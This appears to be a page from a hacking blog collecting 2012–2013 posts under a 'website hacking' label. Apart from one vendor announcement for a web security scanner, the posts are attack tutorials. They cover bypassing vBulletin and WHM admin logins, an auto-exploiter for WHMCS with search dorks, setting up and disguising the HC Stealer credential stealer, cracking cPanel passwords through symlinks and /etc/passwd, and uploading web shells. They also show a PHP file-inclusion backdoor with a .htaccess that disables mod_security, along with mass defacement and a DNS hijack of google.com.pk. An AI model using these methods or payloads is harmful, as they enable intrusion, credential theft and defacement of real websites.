Showing posts with label WEBSITE HACKING. Show all posts
Showing posts with label WEBSITE HACKING. Show all posts

Tuesday, December 31, 2013

|| VB 5.XX ADMIN BYPASS 0DAY ||



Hello friend today i am sharing a video which i had made months back but could share it due to lack of time to make tut.
As tomorrow is NEW years first day so taught to give all my readers a gift. So here it is
Few days back i posted a tut on vBulletin 5 Beta XX SQLi 0day
http://www.hackerzadda.com/2013/09/vbulletin-5-beta-xx-sqli-0day.html
Many of them got the admin username and password too with that
But sadly many were unable to decrypt the pass. So here is the tut to by pass that admin login of vB 5.xx
http://snsw.us/tDpmk
Password:-hackerzadda.com

|| HAPPY NEW YEAR TO ALL MY READERS ||
Read More...

Tuesday, December 10, 2013

Wegilant's BlackHound simplifies web security


 Wegilant, an IIT Bombay incubated company has launched BlackHound - a cloud-based service that scans websites or web applications for security threats and vulnerabilities. BlackHound runs on a private cloud, which makes it easily scalable to scan multiple websites within few minutes. One can also schedule scans & receive thoroughly prepared audit reports to their inbox directly.

BlackHound is a result of research conducted by Mr. Toshendra Sharma as a part of his M.Tech thesis at IIT Bombay. According to Mr. Toshendra Sharma, "The impact of overlooking web security could be huge. Recent reports showed hackers earned $12.5 billion in 2011, mainly by spamming, phishing, and online frauds. Adobe, Facebook, Google - Biggest ever firms are facing hacking pressure. A month ago, we all know Adobe was hacked. But the scale of damage has been higher than initially estimated and may even make it the biggest hacking ever!"
 
 
 
With BlackHound, Wegilant wants to tap the individual & company owned website market. Most businesses across the globe are getting online, and this trend is more so evident in India. BlackHound will make website security affordable and scalable for individuals, small, medium and enterprise clients. Some of the highlights of BlackHound:

  • Detailed reports that help developers patch security threats
  • Schedule scans for up to 6 months in advance
  • No installation required since BlackHound runs on the cloud.

A 30-day FREE Trial is available for everyone to sign up. You can subscribe to BlackHound here: http://weg.io/BlackHoundFreeTrial


About Wegilant
 
Wegilant, an IIT Bombay incubated company delivers IT Security consulting, education and research. They offer strategies, capabilities, and technologies necessary to help businesses preemptively protect Web applications & IT infrastructure from threats. Moreover, Wegilant promotes cyber/internet security education among Indian youth by organizing workshops and competitions pan India. Lectures, workshops and seminars include topics such as 'Cyber Security', 'Computer Forensics' and ‘Ethical Hacking’. Visit Wegilant.com & Wegversity.com for further details.
 
Read More...

Sunday, October 20, 2013

|| WHMCS 0day Auto Exploiter <= 5.2.8 by g00n Team Xploiters ||





So basically, you just need to crack hashes... 
In some cases just Google the hash and you'd get the password. Then log in to WHMCS and....

Scanned results are also saved in a text file: WMCS-Hashes.txt


Here is the PHP code that you must save as WHMCS-Fucker.php:
http://pastebin.com/cuikqkhA
Here are some sample dorks that you can use:
inurl:submitticket.php site:.com
inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:"Powered by WHMCompleteSolution"
intext:"Powered by WHMCompleteSolution" inurl:clientarea.php
inurl:announcements.php intext:"WHMCompleteSolution"
intext:"Powered by WHMCS"
You can derive hundreds of more dorks, using the samples above.

source:-xploiter.net
Read More...

Saturday, September 28, 2013

HC Stealer Better Than iStealer Undetectable PHP LINK


What do you need for this?
Download HC Stealer
Account In 000webhost.com
Setting Up Index.php File & Making Index.php Undectectable
Uploading Files On 000webhost.com
HC Stealer In Action

Download HC Stealer from HERE!!! 

pass:-hackerzadda.com
Account In 000webhost.com
Visit http://www.000webhost.com
Now fill up the form with necessary information like this..


When everything is done correctly, new windows appear in front of you like below.

[Image: 3-4.png]

After this confirm with your email. After activation login to your account detail and go to control panel which is know as CPanel. See below images!!!

[Image: 4-3.png]

[Image: 5-1.png]

[Image: 6-1.png]

When you got this screenshot below then leave it or write down the information because we need that information later on.

[Image: 7-1.png]

Setting Up Index.php File & Making Index.php Undectectable
Extract HC Stealer and then you will find two files called index.php and style.css. Just open index.php with Notepad and follow the screens. I am opening the original index.php file at the moment!!

[Image: 8-1.png]

Now we are going change the highlighted text to make the index.php undetectable!! Just use these codes.
This is Original Code!!

PHP Code:
$html  = "<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><title>HC Stealer 2.0.1 Log manager - "; 
Replace With This Code
PHP Code:
$html  = "<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><title>My Personal Software manager - "; 

You will need to change this one also!!

PHP Code:
$footer  = "<div id='footer'>HC Stealer by The 7th Sage 2011</div></div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-249290-34";
urchinTracker();
</script>
</body></html>"; 
Replace With This Code
PHP Code:
$footer  = "<div id='footer'>Backup manager - Backup Script 2011</div></div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-249290-34";
urchinTracker();
</script>
</body></html>"; 

Save it. It look like this!!!!

[Image: 9.png]

Now you need to install TrueBug PHP Obfuscator. Just find from Google or download TrueBug PHP Obfuscator
After you should install this into your PC. After when the installation finish, just open up TrueBug PHP Obfuscator, Just follow the screens below!!

[Image: 10.png]

Uploading Files On 000webhost.com
Go to control panel known as CPanel > File Manager (If it asks for password, see the "View FTP Details") Then Go to public_html. Create 2/3 new directories there. I am making 2 new directories called Hobbies and Reading which is located inside the Hobbies directory / folder. Now upload your index.php which is located on your desktop and style.css located in HC Stealer Folder. When uploading finish then go back to public_html folder. You will find Hobbies directory / folder, just check this folder then press chmod button located at left side on your screen to set the permissions. Its look like this!!!!


Congratulations!!! You have done all settings..

HC Stealer In Action
Now open up HC Stealer (For Windows 7/Vista Run As Administration). Enter the link to your index.php file in the Url field. Mine ishttp://www.xx.xxxx.com/Hobbies/Reading/index.php. Follow the below image!!!!


Now type your url again in your web address. Put the username and password. Mine is admin and safe123 respectively!!! Press Login button for further access!!. See the image below!!!!
[Image: 13-1.png]


Source:- HF
Read More...

Friday, September 20, 2013

vBulletin 4.x.x and 5.x.x Upgrade 0day Exploit Video Tut


Hello friends today ill show you to to exploit vBulletin 4.x.x and 5.x.x Upgrade 0day Exploit vulnerability to shell vBulletin



Script
Download
Read More...

Sunday, April 7, 2013

|| ROOT A SERVER WITHOUT ANY EXPLOIT VIA WHMCS BY SEN HAXOR ||


ROOT A SERVER WITHOUT ANY EXPLOIT VIA WHMCS BY TUT BY SEN HAXOR


Download the video from below link
http://zyan.me/rbyzB  
Read More...

|| Pr0ject Amaterasu Release 1 ||



The script consist of 10 Most used Tools by Hackers and Pentesters.
2 Private scripts , 1 - Subdomain scanner , 2- Ftp Brute forcer.

it is release 1 , In next list , it will contain up 5 private scripts diff from this.
in Final , it will have all Private scripts plus my own coded scripts :)

Download
http://adf.ly/MRyHO 
Read More...

Sunday, March 31, 2013

|| BYPASS WHM AUTHENTICATION OF RESELLER ||


Hie :)

Today We are Going to Bypass WHM Authentication of Reseller Accounts !

For This We Need Shell On The Reseller Account !! i.e Shell On Reseller's Domain !

Note 1:
For Identification of Reseller Account ! We have 2 Page in "Public_html" Dir With Name "moving.page" And "suspended.page"




Note 2:
its Not Necessary Reseller Account is Hosting Domain .. It can Be Normal Site Also .. In my case Its Normal Domain
i.e   http://i-nom.eu which is using Open-cart CMS !!

i will teach u how to shell Open-Cart CMS in Next Tut's :)

So now
We have 1 shell on reseller Account

http://i-nom.eu/404.php

And Now Our Current Path Is "/home/inom/public_html/"



 Now Just Go Back 1 Directory !! So Now We are Here "/home/inom/"

Now Here Make 1 File With Name ".accesshash" Which Contain U r Password "123456" . U can Change iT With Yours :)




 Now Its Looks Like "/home/reseller/.accesshash"

Now Download 1 Mozilla Addon Called "Modify Headers"

https://addons.mozilla.org/en-us/firefox/addon/modify-headers/

Now Start Modify Header And Add 1 Hedder With Following Value :
Name : "Authorization"    Value : "WHM inom:123456"




Here "WHM" For "WHM Panel" And "inom"  In my case Its Inom is My "UserName" And "123456" is Our "Accesshash"

Now cLick oN Add Tab for Adding It ! :)

And cLick on Start Button In Modify Hedder For Starting It !

Now Just Go To the That Reseller's Domain with This Port :2086

i.e "www.reseller.com:2086"  In My Case Its http://i-nom.eu:2086

And U Will We In Without Any Authentication :D


For Video Lover's ! Here The Demo Of IT :)


Direct Download Link of The Video !

 Direct Downloading Link 1 : http://adf.ly/MDoSh 

Direct Downloading Link 2 : http://zyan.me/bMHXn



There is 1 more Method That i vl tell u in Further Tut's :)

Msg 2 My All LeeT Frnds :- Share u r knowledge Bro // Private Rakhne se Double Nahi Hoga :P

Hope U like It :)

For Any Query Or Advise Cmnt it :)

Read More...

Sunday, March 24, 2013

|| DNS HIJACKING ||


Here is a beautiful Tut From my dear friend H4x4rwOw on DNS HIJACKING




Recommended to download and watch
Download Here
Note:- Only for Educational purpose
Read More...

Tuesday, March 19, 2013

|| DNS SPOOFING ||


Here is a beautiful Tut From my dear friend H4x4rwOw on DNS SPOOFING


Recommended to download and watch
Download Here
Note:- Only for Educational purpose
Read More...

Tuesday, March 12, 2013

|| SHELL UPLOAD+BACK CONNECT+ROOTING+MASSDEFACE ||


HERE WE GO FINALLY MY MASTER TUT ON SHELL UPLOAD+BACK CONNECT+ROOTING+ MASS DEFACE ALL IN ONE VIDEO.. :)

THIS TUT IS DEDICATED TO ALL MY FRIENDS WHO HAVE HELPED ME TO REACH WHAT I AM TODAY IN THIS FIELD AND TO ALL WHO KEEP FOLLOWING AND VISITING MY WEBSITE...
FROM A LONG TIME WANTED TO MAKE THIS KINDA TUT FOR MY BEGINNER FRIENDS WHO STRUGGLE IN ALL THIS..
HOPE THIS WILL HELP YOU IN LEARNING
RECOMMENDED TO DOWNLOAD AND WATCH
Download
NOTE:- ONLY FOR EDUCATIONAL PURPOSE
Read More...

Friday, March 1, 2013

|| WORDPRESS SHELL UPLOAD BYPASS ||



METHOD GIVEN BY MY DEAR FRIEND MAURITANIA ATTACKER TO BYPASS SHELL UPLOAD IN WORDPRESS

LET'S START

1. LOGIN IN TO YOU WORDPRESS
2. GO TO PLUGINS
3. CLICK ON UPLOAD NEW PLUGIN
4. UPLOAD THIS ZIP
5. TO FIND YOUR SHELL GO TO
   Site.com/wp-content/plugins/stats/instoll.php
6. YOU SHOULD HAVE YOUR SHELL THEIR

ALSO REFER TO THE OLD METHOD I POSTED TO UPLOAD SHELL IN WORDPRESS
HERE
Read More...

Saturday, January 19, 2013

|| PRV8 WORDPRESS AND JOOMLA MASS DEFACER ||


Read More...

Tuesday, December 11, 2012

|| HOW TO CRACK CPANELS ||


Hello guys this is AV.. Today i'll show you the two ways to crack cpanel

What we will need for this?
1. shelled website
2. the shelled website should be symlink enableled.

Lets start XD

Method 1
First create two folder's.. Im creating abc & xyz
Now i will upload the files to do symlink and do the symlink
Give 0755 permission to jaguar.pl and run it and put etc/passwd in that
ok after this will get all the config's now you are done with symlinking the server
 Now go the second folder we created and upload B_F.php
and place tour symlink folder link in that
And then click on start
And you have you cpanels's :)

Method 2
In this you need to install python in you pc
Download the script..
we have to run it in cmd.. Before that go to c drive and create a folder with name a
how to run the script?
Open cmd navigate to the directory where you have placed the script
Then type 
cracker.py ww.site.com/abc(this will be our symlinked folder link) c:\a ( this is where it will be saved
 and then press enter. It will start its work

It will give you a passwords copy them all
Now upload a cpanel bruter
paste all the passwords in pass area 
For user's go to shell and give command 
ls /var/mail
and you will get all usernames paste it in user's area
And click on start






































It will give you the results
You can default pass list or pass list you have in cpanel bruter pass area..
Script
Download
Hope you liked the tut and learned some thing
Happy Hacking
Note:- Only for educational purpose
Read More...

Thursday, November 29, 2012

|| 403 Forbidden and cant read /etc/named.conf Error Bypass ||


This Tut has been submitted by Sen Haxor :D

Now days most of the 2012 Linux Kernel server show this error when you try to symlink the server . Most of the server which shows 403 forbidden has cant read named.config error when you try to symlink using scripts like Symlink_Sa or Madspot Security Team Shell or what ever script used for Automated Symlink .


Posted Image

This can be bypassed by Reading /ect/passwd and Symlink_Sa 3.0 can be used to bypass this .


I will be posting the download link of some shells i will be using in this tutorial


Best Script which can bypass cant read /ect/named.conf are
:

1. Config Fucker By Web Root Hack Tools.
( Mass Symlink Config files )
2. Config Killer By Team Indishell . ( Mass Symlink Config file php based script )

3. Symlink Pain [~] allsoft.pl ( Perl Script to Mass Symlink Config files )

4. Symlink_Sa 3.0 Automated Symlink Script .


Usage : Config Fucker , Con
fig Killer and Symlink Pain [~] Perl script just upload them on to the server make sure that you create a new directory . Upload the scirpt and use the command cat /ect/passwd to read all /ect/passwd from the server and copy them and just open your script and paste it there and click on Get Config and Your Done . Just open the link of the folder you created eg . site.com/sen/allsoft.pl you need to open site.com/sen/ and all config files will be there :D

Note : Its better to create a php.ini file before you do this for 100 % Result ^_^


All 4 shells i have mentioned i will post the download link :D


And i will be using a another private shell for this which i wont be giving you all
for Priv8 Issue its Mannu Shell Coded by Team Indishell Which can bypass cant read /ect/named.conf error easily . But 403 Forbidden Server cant be bypassed using this shell .

So now if we cant to symlink to the Public_html/ of the website we can use Symlink_sa 3.0 script Symlink Bypass Option -


Posted Image

So now that we can easily Symlink to /Public_html/ path of each website :rolleyes:


Now some server show 403 forbidden Error when you try to Symlink them so now lets see how to by pass this shit ;)




For 403 Forbidden Error i will be Using the Following Shells :


1. Dhanush Shell Coded By Arjun . ( This shell automitically creates .htaccess , php.ini and ini.php files after you login )

2. Mannu Shell by Team Indishell Private ! .

3. Symlink_sa 3.0 Script


I will be posting the download link of Dhanush shell and Symlink
_sa 3.0 ( Mannu shell is private as i already told )

So what is the trick that makes us bypass 403 Forbidden
, Its just the .htaccess and php.ini which contains the following code :

.htaccess


<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>


php.ini


<?

echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>


1.) 403 Forbidden Error :


Posted Image
2.) Open Dhanush Shell which automatically creates .htaccess , php.ini and ini.php .

Posted Image

3.) Mannu shell to Check if we Bypassed 403 Error
:

Posted Image


4.) Bypassed 403 Forbidden and Access to Public_html/ Path


Posted Image
Bypassed can't read /ect/named.conf and 403 forbidden Error :wub:

Here Download Link of all shell and script i used
:  

http://zyan.me/Lcyil  

Greetz : CyberAce Legion Who made me make this Tut and Team Indishell and all Indian Hackers .
Thanks :D


Regards Sen Haxor B)
Read More...

Sunday, November 25, 2012

How google.com.pk was hacked??


HII GUYS YOU SAW MANY HACK TODAY WITH GOOGLE.COM.PK AND MANY OTHERS AND SUBDOAMIN CREATED
LETS SEE HOW IT WAS DONE
1. GO TO http://whois.domaintools.com/
2. ENTER google.com.pk

YOU WILL SEE THIS
SEE THE NAME SERVER HAS BEEN CHNAGED TO
dns1.freehostia.com
dns2.freehostia.com

3.GO TO FREEHOSTIA.COM AND SIGN UP
   WHILE SIGNING UP PUT BELOW DETAILS

IN USE MY EXISITING DOMAIN PUT domain name you want.google.com.pk
AND REGISTER.

AFTER THAT YOU WILL RECEIVE AND EMAIL LOGIN WITH THE DETAILS RECIEVED ONCE YOU LOGIN YOU WILL SEE THIS SCREEN

THEN CLICK ON MY DOMAINS AND THEN DNS RECORDS AND CLICK ON THE DOMAIN YOU CREATED

CHANGE SECOND LINE TYPE =MX VALUE TO
dns1.freehostia.com
or
dns2.freehostia.com
AND CLICK ON MODIFY
AND THEN GO TO FILES--> FILE MANAGER
YOU WILL SEE A FOLDER WITH YOUR DOMAIN NAME.. OPEN IT
AND UPLOAD YOUR DEFACE PAGE YOUR DONE!!!!

http://www.picasaweb.google.pk/
http://jaguarhacker.google.com.pk/

http://www.zone-h.org/mirror/id/18642644
http://www.zone-h.org/mirror/id/18642652
Read More...